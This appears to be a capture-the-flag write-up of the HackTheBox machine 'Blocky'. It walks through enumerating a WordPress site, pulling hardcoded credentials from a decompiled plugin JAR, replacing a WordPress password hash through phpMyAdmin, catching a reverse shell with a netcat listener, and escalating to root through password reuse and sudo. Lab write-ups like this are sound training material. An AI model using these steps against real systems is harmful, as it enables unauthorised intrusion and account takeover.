Blocky
I’m getting out of order now. Whoops.
Ports
This has got:
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2
FTP
ProFTPD 1.3.5 (before 1.3.5a ) had a horrible vulnerability; this version does not. No anon access. Moving on.
HTTP
We have a wordpress site, but let’s run feroxbuster:
┌──( root💀kali) -[/opt/htb/blocky]
└─# feroxbuster -u http://10.10.10.37 -w /usr/share/seclists/Discovery/Web-Content/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_ / | | \ |__
| |___ | \ | \ | \_ _, \_ _/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.37
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ [ 200, 204, 301, 302, 307, 308, 401, 403, 405]
💥 Timeout ( secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403 11l 32w 290c http://10.10.10.37/.hta
403 11l 32w 299c http://10.10.10.37/server-status
301 9l 28w 313c http://10.10.10.37/wp-admin
301 9l 28w 315c http://10.10.10.37/wp-content
403 11l 32w 299c http://10.10.10.37/wp-admin/.hta
403 11l 32w 301c http://10.10.10.37/wp-content/.hta
301 0l 0w 0c http://10.10.10.37/index.php
301 9l 28w 322c http://10.10.10.37/wp-admin/includes
301 9l 28w 315c http://10.10.10.37/phpmyadmin
405 1l 6w 42c http://10.10.10.37/xmlrpc.php
301 9l 28w 323c http://10.10.10.37/wp-content/uploads
302 0l 0w 0c http://10.10.10.37/wp-admin/index.php
301 9l 28w 320c http://10.10.10.37/wp-admin/images
301 9l 28w 319c http://10.10.10.37/wp-admin/maint
301 9l 28w 322c http://10.10.10.37/wp-content/themes
301 9l 28w 317c http://10.10.10.37/wp-admin/css
301 9l 28w 309c http://10.10.10.37/wiki
403 11l 32w 308c http://10.10.10.37/wp-admin/includes/.hta
403 11l 32w 308c http://10.10.10.37/wp-content/themes/.hta
403 11l 32w 303c http://10.10.10.37/wp-admin/css/.hta
403 11l 32w 295c http://10.10.10.37/.htaccess
403 11l 32w 301c http://10.10.10.37/phpmyadmin/.hta
301 9l 28w 312c http://10.10.10.37/plugins
403 11l 32w 306c http://10.10.10.37/wp-admin/images/.hta
403 11l 32w 309c http://10.10.10.37/wp-content/uploads/.hta
200 0l 0w 0c http://10.10.10.37/wp-content/index.php
403 11l 32w 295c http://10.10.10.37/wiki/.hta
403 11l 32w 305c http://10.10.10.37/wp-admin/maint/.hta
403 11l 32w 298c http://10.10.10.37/plugins/.hta
301 9l 28w 321c http://10.10.10.37/wp-admin/network
301 9l 28w 319c http://10.10.10.37/phpmyadmin/doc
403 11l 32w 310c http://10.10.10.37/wp-admin/maint/.htpasswd
403 11l 32w 310c http://10.10.10.37/phpmyadmin/doc/.htaccess
403 11l 32w 310c http://10.10.10.37/phpmyadmin/doc/.htpasswd
[ ####################] - 1m 65534/65534 0s found:34 errors:47240
[ ####################] - 57s 4681/4681 84/s http://10.10.10.37
[ ####################] - 46s 4681/4681 104/s http://10.10.10.37/wp-admin
[ ####################] - 42s 4681/4681 112/s http://10.10.10.37/wp-content
[ ####################] - 33s 4681/4681 141/s http://10.10.10.37/wp-admin/includes
[ ####################] - 38s 4681/4681 135/s http://10.10.10.37/phpmyadmin
[ ####################] - 34s 4681/4681 137/s http://10.10.10.37/wp-content/uploads
[ ####################] - 34s 4681/4681 151/s http://10.10.10.37/wp-admin/images
[ ####################] - 35s 4681/4681 132/s http://10.10.10.37/wp-admin/maint
[ ####################] - 33s 4681/4681 139/s http://10.10.10.37/wp-content/themes
[ ####################] - 33s 4681/4681 140/s http://10.10.10.37/wp-admin/css
[ ####################] - 31s 4681/4681 150/s http://10.10.10.37/wiki
[ ####################] - 29s 4681/4681 177/s http://10.10.10.37/plugins
[ ####################] - 17s 4681/4681 386/s http://10.10.10.37/wp-admin/network
[ ####################] - 21s 4681/4681 235/s http://10.10.10.37/phpmyadmin/doc
Lots of juicy stuff there! At plugins we find Cute File Browser with two files - BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar .
We can extract the jar:
┌──( root💀kali) -[/opt/htb/blocky]
└─# jar -xf BlockyCore.jar
Picked up _JAVA_OPTIONS: -Dawt .useSystemAAFontSettings= on -Dswing .aatext= true
And then we have BlockyCore.class . I don’t have a Java decompiler so I go to http://www.javadecompilers.com/ and decompile the file:
//
// Decompiled by Procyon v0.5.36
//
package com.myfirstplugin ;
public class BlockyCore
{
public String sqlHost ;
public String sqlUser ;
public String sqlPass ;
public BlockyCore () {
this . sqlHost = "localhost" ;
this . sqlUser = "root" ;
this . sqlPass = "8YsqfCTnvxAUeduzjNSXe22" ;
}
public void onServerStart () {
}
public void onServerStop () {
}
public void onPlayerJoin () {
this . sendMessage ( "TODO get username" , "Welcome to the BlockyCraft!!!!!!!" );
}
public void sendMessage ( final String username , final String message ) {
}
}
Those creds look interesting! Let’s go to phpmyadmin and login. This works; we can grab the hash for our lone wordpress user, notch . It doesn’t want to crack immediately with John so I replace it with:
$P$BDZFisiinAqGeR02VRcdlEcP7IZvxL1
Which is the wordpress hash for password . With this changed I can log in at /wp-admin/. I upload a plugin as a zipfile and get a shell.
Privesc
The privesc was very simple; the password we extracted from the JAR file was also the system password for notch ; and he is in the sudo group.
┌──( root💀kali) -[/opt/htb/blocky]
└─# nc -nvlp 1234
listening on [ any] 1234 ...
connect to [ 10.10.14.4] from ( UNKNOWN) [ 10.10.10.37] 43190
bash: cannot set terminal process group ( 1464) : Inappropriate ioctl for device
bash: no job control in this shell
www-data@Blocky:/var/www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<ml/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@Blocky:/var/www/html/wp-admin$ su notch
su notch
Password: 8YsqfCTnvxAUeduzjNSXe22
notch@Blocky:/var/www/html/wp-admin$ sudo su
sudo su
[ sudo ] password for notch: 8YsqfCTnvxAUeduzjNSXe22
root@Blocky:/var/www/html/wp-admin# cd /root
cd /root
root@Blocky:~# cat root.txt
cat root.txt
# flag goes here
Another one bites the dust.